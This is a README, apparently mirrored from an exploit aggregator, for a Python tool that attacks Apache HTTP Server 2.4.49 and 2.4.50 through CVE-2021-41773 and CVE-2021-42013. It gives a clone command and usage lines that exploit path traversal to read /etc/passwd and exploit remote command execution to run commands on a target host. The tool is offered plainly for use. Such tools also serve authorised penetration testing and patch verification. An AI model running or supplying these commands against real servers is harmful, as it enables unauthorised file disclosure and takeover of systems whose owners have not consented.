Share
## https://sploitus.com/exploit?id=866E26E3-759B-526D-ABB5-206B2A1AC3EE
# Apache-CVEs
Exploit created in python3 to exploit known vulnerabilities in Apache web server (CVE-2021-41773, CVE-2021-42013)

## What's apache

The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows. The goal of this project is to provide a secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards.

## Version Affected

- CVE-2021-41773 -> 2.4.49
- CVE-2021-42013 -> 2.4.50

# How to install

Just do a git clone:

```
git clone https://github.com/0xGabe/Apache-CVEs
```

# CVE-2021-41773

## How to use

### Path traversal

To read the desired file, just pass the file path, if the user does not have permission to read, there will be no reading result.

```
python3 cve-2021-41773.py --url http://HOST:PORT --path /etc/passwd
```

### Remote Command Execution

To execute commands with spaces, special characters or the like on the target machine, it is necessary to pass the command in quotes.

```
python3 cve-2021-41773.py --url http://HOST:PORT --cmd id
```

# CVE-2021-42013

## How to use

### Path traversal

To read the desired file, just pass the file path, if the user does not have permission to read, there will be no reading result.

```
python3 cve-2021-42013.py --url http://HOST:PORT --path /etc/passwd
```

### Remote Command Execution

To execute commands with spaces, special characters or the like on the target machine, it is necessary to pass the command in quotes.

```
python3 cve-2021-42013.py --url http://HOST:PORT --cmd id
```